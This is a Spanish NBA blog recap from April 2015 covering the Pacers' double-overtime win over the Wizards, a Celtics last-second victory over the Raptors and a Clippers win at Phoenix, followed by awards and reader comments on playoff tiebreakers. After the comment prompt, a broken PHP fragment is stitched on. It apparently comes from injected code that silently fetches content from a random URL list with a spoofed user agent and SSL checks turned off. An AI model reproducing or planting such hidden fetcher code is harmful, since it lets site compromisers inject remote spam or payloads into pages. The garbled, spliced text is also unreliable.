La Crónica: Los Pacers activan el ‘Modo Supervivencia’

15 de April de 2015 por MagicJohnson32

Casi se nos pasa… Antes de entrar al detalle de lo ocurrido la pasada madrugada queremos expresar  nuestro profundísimo agradecimiento a alguno de vosotros que ha decidido que este blog merecía una donación. Es un gesto que, sin caer en la exageración, nos emociona y nos anima en este tramo final de temporada. Gracias, gracias, gracias, tanto al ‘donante’ como a los que participáis como a los que únicamente nos leéis. A veces no os lo decimos lo suficiente, así que sirva esto como recordatorio.

Ahora sí, vamos con la crónica.

La penúltima madrugada de la regular season 2014-2015 sirvió para resolver algunas de las incógnitas pendientes, aunque la mayoría de ellas quedarán pendientes para esta próxima y apasionante noche que se nos presenta. Ya sabemos, por ejemplo, dos eliminatorias de primera ronda del Este, la que enfrentará a Cavs y Celtics y la que disputarán Raptors y Wizards. También podemos decir con certeza que los Heat no estarán en la postemporada, consecuencia directa de la victoria de los Pacers. También ganaron los Clippers, que se colocan segundos del Oeste aunque dudamos de que esta sea la posición que ocupen cuando finalicen los partidos de la última jornada de regular season.

Washington Wizards 95 – Indiana Pacers 99 (2OT)

Nadie dijo que sería fácil. Desde luego, no lo será (en caso de producirse) la clasificación para Playoffs de los Pacers pero, con una muy sufrida victoria en dos prórrogas sobre los Wizards, se aseguran depender de sí mismos la próxima madrugada en su visita a Memphis. A los de Vogel le sirve tanto una victoria propia como una derrota de los Nets, su único rival ya por ese billete final para la postemporada después de que los Heat hayan quedado matemáticamente eliminados. La situación angustiosa de los Pacers (“Modo Supervivencia”, lo llamó Paul George) condicionó el encuentro, muy carente de brillantez y que solo se resolvió de manera favorable para los locales gracias a la perseverancia y la resistencia mental que les viene caracterizando en los últimos tiempos. Y gracias también a George Hill, auténtico motor de la racha que ha permitido a Indiana enlazar seis victorias consecutivas y alcanzar la última jornada con posibilidades de disputar de nuevo los Playoffs.

Toronto Raptors 93 – Boston Celtics 95

Una suspensión de Jae Crowder desde la esquina a menos de un segundo para el final dio a los Celtics la victoria sobre los Raptors y les aseguró una muy meritoria séptima posición y un cruce en primera ronda con los Cleveland Cavaliers. Pese a la derrota segura que les espera frente a LeBron & Co., la clasificación para Playoffs premia la excelente campaña del jovencísimo grupo dirigido con maestría por Brad Stevens. Ante los Raptors, que tenían asegurada la cuarta plaza y una cita con los Wizards, los Celtics no cayeron en la tentación de especular con una derrota con tal de evitar a los Cavs y, tras verse 15 abajo mediado el segundo cuarto, remaron para igualar la contienda en el tercer periodo y llevar el partido a un desenlace a cara o cruz. El intercambio final de canastas fue lo mejor del partido: en los últimos 35 segundos se anotaron cinco canastas, la última de ellas el lanzamiento de Crowder con el que abríamos la crónica de este partido y que neutralizó las dos bandejas con las que Lowry había igualado el marcador.

LA Clippers 112 – Phoenix Suns 101

Los Clippers vivirán la jornada final de la regular season 2014-2015 como espectadores. Los angelinos disputaron y vencieron su 82º partido anoche en Phoenix, donde sellaron un estupendo balance de 56-26 que les sitúa, al menos de momento, como segundos del Oeste, aunque para conservar la posición necesitan que Spurs y Rockets pierdan esta próxima madrugada. La séptima victoria consecutiva de los de Doc Rivers llegó ante unos Suns cogidos con alfileres, repletos de bajas y que, después de pelear casi toda la campaña por un puesto en Playoffs, se han hundido en la recta final y cierran la regular season con 10 derrotas en los últimos 11 partidos. Así, los Clippers dominaron de principio a fin, con una renta que creció hasta los 30 puntos antes de que un último ataque de orgullo local redujese la distancia a 10 puntos y dejase el marcador final en algo mucho más digno.

PREMIOS

MVP: Los Pacers consiguieron una victoria imprescindible para seguir optando a los playoffs gracias en buena parte a los 24 puntos, 9 rebotes y 10 asistencias de George Hill. 

Rookie: TJ Warren sigue disfrutando de minutos en este final de temporada. Ayer jugó 43, en los que consiguió 10 puntos y repartió 6 asistencias. Marcus Smart colaboró en la clasificación definitiva de los Celtics para playoffs con 9 puntos, 5 rebotes y 3 asistencias.

Sorpresa: El final de temporada es propicio para las sorpresas diarias, como por ejemplo la de Lester Hudson, de quien hemos tenido que comprobar en qué equipo juega tras descubrir que ha disputado 21 minutos en los que ha anotado 11 puntos y repartido 5 asistencias. Por cierto, juega en los Clippers. Earl Barron es uno de los habituales por estas fechas cada temporada con un equipo diferente. Ahora está en los Suns y ayer anotó 9 puntos y capturó 4 rebotes.

Decepción: Noche de escopetas de feria. Kyle Lowry acabó con un 6 de 20 y John Wall con 7 de 23. Pero el premio de la noche se lo lleva Bradley Beal y su 7 de 24.

Esfuerzo en vano: Los Wizards no se jugaban nada pero debe de dar rabia perder tras dos prórrogas, sobre todo cuando tú has hecho un buen partido y anotado 19 puntos y capturado 10 rebotes. Es lo que le pasó ayer a Marcin Gortat.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Nacho dice:
    #1

    Magic, por mucho que Chicago les haya mesado las barbas a los Raptors esta temporada, los canadienses son campeones de división, con lo que cualquier empate con otro equipo no campeón, se resuelve a su favor, con lo que aún pueden ser terceros.

      Citar

  2. MagicJohnson32 dice:
    #2

    Nacho:
    Magic, por mucho que Chicago les haya mesado las barbas a los Raptors esta temporada, los canadienses son campeones de división, con lo que cualquier empate con otro equipo no campeón, se resuelve a su favor, con lo que aún pueden ser terceros.

    No es exactamente así. Los campeones de división se aseguran estar entre los cuatro primeros. En este caso, el empate sería entre 3º y 4º, por lo que el ser campeón de división no afectaría y se resolvería como cualquier otro empate (es decir, por el balance en los enfrentamientos directos, que en este caso sería favorable a Chicago). En definitiva, los Raptors ya no pueden ser terceros y habrá Raptors-Wizards en primera ronda seguro. 😉

      Citar

  3. Nacho dice:
    #3

    De NBA.com:
    a. Two Teams Tied b. More Than Two Teams Tied
    (1) Division leader wins tie from team not leading a division. (1) Division leader wins tie from team not leading a division.
    (2) Better winning percentage in games against each other. (2) Better winning percentage in all games among the tied teams.
    (3) Better winning percentage against teams in own division (only if tied teams are in same division). (3) Better winning percentage against teams in own division (only if all tied teams are in the same division).
    (4) Better winning percentage against teams in own conference. (4) Better winning percentage against teams in own conference.
    (5) Better winning percentage against teams eligible for playoffs in own conference (including teams that finished the regular season tied for a playoff position). (5) Better winning percentage against teams eligible for playoffs in own conference (including teams that finished the regular season tied for a playoff position).
    (6) Better winning percentage against teams eligible for playoffs in opposite conference (including teams that finished the regular season tied for a playoff position). (6) Better net result of total points scored less total points allowed against all opponents (“point differential”).
    (7) Better net result of total points scored less total points allowed against all opponents (“point differential”).

      Citar

  4. Jose Luis dice:
    #4

    Y según NBA.com, Clippers no lower than 3º

      Citar

  5. Ruxixón dice:
    #5

    Pobre Indiana,doble prórroga y a jugar en Memphis.

      Citar

  6. MagicJohnson32 dice:
    #6

    Jose Luis:
    Y según NBA.com, Clippers no lower than 3º

    Cierto, cierto, que los Clippers quedan por delante de los Rockets en caso de triple empate.

    Lo de Raptors-Wizards es que lo he leído en ESPN y NBA.com: “Kyle Lowry had 16 points for the Raptors, who are locked into the fourth seed and will face Washington”, pero sí, según esas reglas los Raptors pueden ser terceros. Que vaya reglas más absurdas, dicho sea de paso.

    En fin, gracias a ambos por los apuntes. No os preocupéis que la crónica de mañana detallará los emparejamientos de Playoffs.

      Citar

  7. franitis dice:
    #7

    Ruxixón:
    Pobre Indiana,doble prórroga y a jugar en Memphis.

    Es una pena ese último partido de Indiana en comparación al último de Brooklyn. Sobre el papel tiene toda la pinta que pasan los Nets. Y no han hecho estos mucho más mérito para estar en PO.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>